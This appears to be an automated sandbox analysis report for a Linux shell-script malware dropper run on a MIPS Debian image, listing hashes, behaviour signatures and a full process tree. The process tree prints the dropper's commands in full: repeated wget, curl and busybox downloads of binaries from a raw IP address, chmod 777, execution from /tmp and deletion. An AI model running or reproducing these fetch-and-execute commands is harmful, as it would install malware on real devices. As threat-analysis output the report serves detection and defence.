Analysis
-
max time kernel
147s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
09-11-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsel-20240729-en
General
-
Target
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
-
Size
10KB
-
MD5
8024f690eb7cff058a13d1d38f0b31c0
-
SHA1
c4be3a2eb04473145808dd1ce797dce7815d06dc
-
SHA256
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
-
SHA512
9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
-
SSDEEP
192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid process
832 chmod
855 chmod
891 chmod
819 chmod
807 chmod
867 chmod
885 chmod
903 chmod
738 chmod
782 chmod
909 chmod
915 chmod
744 chmod
759 chmod
813 chmod
873 chmod
879 chmod
897 chmod
922 chmod
928 chmod
731 chmod
-
Executes dropped EXE 21 IoCs
Processes:
ioc pid process
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 732 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 739 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 745 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 760 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 783 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 808 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 814 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 820 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 834 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 856 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 868 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 874 Q2coityNz9jjImihquLcKzocOGf1iQj2tw
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 880 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 886 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 892 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 898 Q2coityNz9jjImihquLcKzocOGf1iQj2tw
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 904 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 910 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 916 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 923 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 929 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX
-
Processes:
description ioc process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc process
File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl
File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl
File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl
File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl
File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl
File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl
File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl
File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl
File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl
File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl
File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl
File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl
File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl
File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl
File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl
File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl
File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl
File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl
File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl
File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl
File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl
Processes
-
/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:707
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:729
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:731 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:732 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:733
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:734
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:737
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:738 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:739 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:740
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:741
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:743
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:744 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:745 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:746
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:747
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:755
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:759 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:760 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:763
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:765
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:770 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:778
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:782 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:783 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:786
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:787
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:805
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:807 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:808 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:809
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:810
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:812
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:813 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:814 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:815
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:816
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:818
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:819 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:820 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:821
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:822
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:828
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:832 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:834 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:837
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:838
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:852
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:855 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:856 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:859
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:860
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:866
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:867 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:868 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:869
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:870
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:872
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:873 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:874 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:875
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:876
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:878
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:879 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:880 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:881
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:882
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:884
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:885 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:886 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:887
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:888
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:890
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:891 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:892 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:893
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:894
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:896
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:897 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:898 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:899
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:900
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:902
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:903 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:904 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:905
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:906
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:908
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:909 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:910 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:911
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:912
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:914
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:915 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:916 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:917
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:918
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:921
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:922 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:923 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:924
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:925
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:927
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:928 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:929 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:930
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97